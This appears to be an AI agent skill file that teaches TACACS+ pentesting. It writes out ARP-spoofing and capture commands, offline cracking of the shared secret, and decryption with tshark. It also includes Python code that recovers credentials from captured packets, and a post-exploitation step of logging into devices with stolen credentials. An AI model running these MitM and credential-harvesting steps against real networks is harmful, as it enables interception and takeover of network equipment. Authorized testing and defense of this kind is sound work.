Hacktricks-skills tacacs-pentest

How to pentest TACACS+ authentication systems on port 49. Use this skill whenever the user mentions TACACS, TACACS+, port 49, network device authentication, AAA services, Cisco network pentesting, or wants to test network access control systems. This skill covers intercepting authentication traffic, performing MitM attacks, brute-forcing the shared encryption key, and decrypting TACACS+ traffic.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/49-pentesting-tacacs+/SKILL.MD
source content

TACACS+ Pentesting

This skill guides you through pentesting TACACS+ (Terminal Access Controller Access Control System Plus) authentication systems. TACACS+ is commonly used to centrally validate users accessing routers, switches, and Network Access Servers (NAS).

When to Use This Skill

Use this skill when:

  • You discover port 49/tcp open on a target
  • You need to test TACACS+ authentication security
  • You want to intercept and analyze TACACS+ traffic
  • You're pentesting network infrastructure with AAA services
  • You need to brute-force TACACS+ encryption keys
  • You want to decrypt captured TACACS+ traffic

Understanding TACACS+

TACACS+ separates authentication, authorization, and accounting (AAA) into distinct services:

  • Authentication: Verifies user credentials
  • Authorization: Determines what actions users can perform
  • Accounting: Logs user activities for auditing

Default port: 49/tcp

Attack Methodology

1. Intercept TACACS+ Traffic

The first step is capturing TACACS+ traffic between clients and the server. This requires positioning yourself in the network path.

Why this matters: TACACS+ obfuscates the packet body but sends the header in the clear, so captured traffic is usable for offline analysis. The shared secret is never transmitted, but a captured exchange can be taken offline and the secret brute-forced locally, which produces no failed-authentication entries in the server's logs.

How to capture:

# Basic capture on interface
sudo tcpdump -i <interface> -s 0 -w tacacs_capture.pcap port 49

# Filter for specific TACACS server
sudo tcpdump -i <interface> -s 0 -w tacacs_capture.pcap host <tacacs_server_ip> and port 49

2. Perform Man-in-the-Middle Attack

If you're not already in the network path, you may need to perform an ARP spoofing attack to intercept traffic.

Why this matters: ARP spoofing allows you to position yourself between the TACACS client and server, enabling traffic interception.

Tools for MitM:

  • arpspoof: from the dsniff package
  • bettercap: for modern networks
  • Ettercap: for comprehensive MitM

Example with arpspoof:

# Terminal 1: Spoof the server to the client
sudo arpspoof -i <interface> -t <client_ip> <server_ip>

# Terminal 2: Spoof the client to the server
sudo arpspoof -i <interface> -t <server_ip> <client_ip>

# Terminal 3: Enable IP forwarding and capture
sudo sysctl -w net.ipv4.ip_forward=1
sudo tcpdump -i <interface> -s 0 -w tacacs_capture.pcap port 49

3. Brute-Force the Encryption Key

Once you have captured TACACS+ traffic, extract the encrypted authentication key and attempt to brute-force it.

Why this matters: TACACS+ obfuscates the packet body with an MD5-derived keystream seeded by the shared secret (RFC 8907, section 4.5), not with an authenticated cipher. If you recover the key, you can decrypt all captured traffic and extract sensitive information such as usernames and commands.

Using Loki:

Loki is a specialized tool for TACACS+ key cracking:

# Install Loki (if not already available)
# Clone from: https://c0decafe.de/svn/codename_loki/trunk/

# Run Loki GUI
sudo loki_gtk.py

# Or use command line
sudo loki.py <capture_file.pcap>

Alternative brute-force approaches:

# Using hashcat: mode 16100 is the TACACS+ mode (raw MD5, -m 0, does not match the
# MD5-derived keystream); the hash line must be extracted from the capture first
hashcat -m 16100 <hash_file> <wordlist>

# Using custom scripts for dictionary attacks
python scripts/tacacs_bruteforce.py <capture.pcap> <wordlist>

4. Decrypt TACACS+ Traffic

After successfully cracking the key, decrypt the captured traffic to extract sensitive information.

Why this matters: Decrypted traffic reveals usernames, commands executed, and potentially administrative credentials that can be used to gain control of network equipment.

Using Wireshark:

  1. Open the capture file in Wireshark
  2. Go to Edit → Preferences → Protocols → TACACS+
  3. Enter the cracked key in the "Shared Secret" field
  4. Click OK and the traffic will be automatically decrypted

What you can extract:

  • Banner information from network devices
  • Administrative usernames
  • Commands executed on devices
  • Authentication attempts

Command-line alternative with tshark:

# Decrypt with the cracked shared secret. Wireshark's dissector is "tacplus" and the key
# is a protocol preference (-o), not a decode-as (-d) rule; -V prints the decoded fields
tshark -r tacacs_capture.pcap -o tacplus.key:<cracked_key> -Y tacplus -V
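The obfuscation behind steps 3 and 4, as an added example that is not part of this skill or its scripts: it parses the cleartext header, implements the RFC 8907 pseudo-pad, recovers an authentication START body with a known key (what Wireshark does once the key preference is set), and flags packets that carry the unencrypted flag, which a defender should alert on. The shared secret, session id and credentials are constructed demo values, and `build_authen_start` exists only to fabricate the sample packet.

```python
import hashlib
import struct
# Constructed demo values (not from any real capture): weak secret; SAMPLE_PKT below is one fabricated PAP login.
SAMPLE_KEY = b"cisco123"
TAC_PLUS_UNENCRYPTED_FLAG = 0x01   # RFC 8907 4.1: body sent in the clear, worth alerting on

def parse_header(pkt: bytes) -> dict:
    """Split the 12-byte TACACS+ header (RFC 8907 4.1); the header is never obfuscated."""
    version, ptype, seq_no, flags, session_id, length = struct.unpack("!BBBBII", pkt[:12])
    return {"version": version, "type": ptype, "seq_no": seq_no, "session_id": session_id,
            "unencrypted": bool(flags & TAC_PLUS_UNENCRYPTED_FLAG), "body": pkt[12:12 + length]}

def pseudo_pad(session_id: int, key: bytes, version: int, seq_no: int, n: int) -> bytes:
    """RFC 8907 4.5: MD5_1 = MD5(session_id|key|version|seq_no), MD5_i = MD5(seed|MD5_{i-1}).
    All inputs but the key sit in the cleartext header, so a guess costs one MD5 offline."""
    seed = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < n:
        prev = hashlib.md5(seed + prev).digest()
        pad += prev
    return pad[:n]

def deobfuscate(hdr: dict, key: bytes) -> bytes:
    """XOR the body with the pad; the same step both obfuscates and recovers it."""
    if hdr["unencrypted"]:
        return hdr["body"]
    pad = pseudo_pad(hdr["session_id"], key, hdr["version"], hdr["seq_no"], len(hdr["body"]))
    return bytes(a ^ b for a, b in zip(hdr["body"], pad))

def parse_authen_start(body: bytes) -> dict:
    """Decode an authentication START body (RFC 8907 5.1): 8 fixed octets, then 4 strings."""
    action, priv_lvl, authen_type, service, ulen, plen, rlen, dlen = body[:8]
    fields = {"action": action, "priv_lvl": priv_lvl, "authen_type": authen_type, "service": service}
    off = 8
    for name, ln in (("user", ulen), ("port", plen), ("rem_addr", rlen), ("data", dlen)):
        fields[name] = body[off:off + ln]
        off += ln
    return fields

def build_authen_start(session_id, key, user, port, rem_addr, data, authen_type=2, flags=0):
    """Fabricate a client START packet (PAP by default, so the password travels in `data`)."""
    body = bytes([1, 1, authen_type, 1, len(user), len(port), len(rem_addr), len(data)])
    body += user + port + rem_addr + data
    hdr = struct.pack("!BBBBII", 0xC0, 1, 1, flags, session_id, len(body))
    return hdr + deobfuscate(parse_header(hdr + body), key)

def inspect(pkt: bytes, key: bytes) -> dict:
    """What Wireshark does once the key preference is set: recover and decode the body."""
    return parse_authen_start(deobfuscate(parse_header(pkt), key))
SAMPLE_PKT = build_authen_start(0x1A2B3C4D, SAMPLE_KEY, b"netadmin", b"tty0", b"10.0.0.7", b"Winter2024!")
```

Because every pad input except the secret is readable in the header, a long random shared secret is the only thing that makes the offline guess expensive; a packet whose header has the unencrypted flag set needs no guessing at all.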

Post-Exploitation

Once you have credentials from decrypted TACACS+ traffic:

  1. Access network equipment: Use extracted credentials to log into routers, switches, or NAS devices
  2. Escalate privileges: Look for additional access or misconfigurations
  3. Document findings: Record all discovered vulnerabilities and credentials
  4. Remediate: Recommend proper key management and network segmentation

Security Recommendations

After pentesting, recommend these mitigations:

  • Use strong, unique keys: Avoid default or weak TACACS+ shared secrets
  • Implement network segmentation: Limit TACACS+ traffic to management VLANs
  • Enable TACACS+ over TLS: Use TACACS+ with additional encryption layers
  • Monitor for anomalies: Set up alerts for unusual TACACS+ authentication patterns
  • Regular key rotation: Change shared secrets periodically
  • Consider RADIUS or 802.1X: Evaluate alternative authentication protocols

Example Workflow

Scenario: You discover port 49 open on a target network during a pentest engagement.

Step-by-step:

  1. Reconnaissance: Confirm TACACS+ service is running

     nmap -sV -p 49 <target_ip>

  2. Position for interception: Set up MitM if needed

     # Use the scripts provided in this skill
     ./scripts/setup_tacacs_capture.sh <interface> <client_ip> <server_ip>

  3. Capture traffic: Collect TACACS+ packets

     ./scripts/capture_tacacs.sh <interface> <output_file.pcap>

  4. Brute-force key: Attempt to crack the encryption key

     ./scripts/bruteforce_tacacs_key.sh <capture.pcap> <wordlist>

  5. Decrypt and analyze: Extract sensitive information

     ./scripts/decrypt_tacacs_traffic.sh <capture.pcap> <cracked_key>

Important Notes

  • Authorization: Only perform these tests on systems you have explicit permission to test
  • Legal compliance: Ensure your activities comply with applicable laws and regulations
  • Documentation: Keep detailed records of all testing activities
  • Responsible disclosure: Report findings to appropriate stakeholders
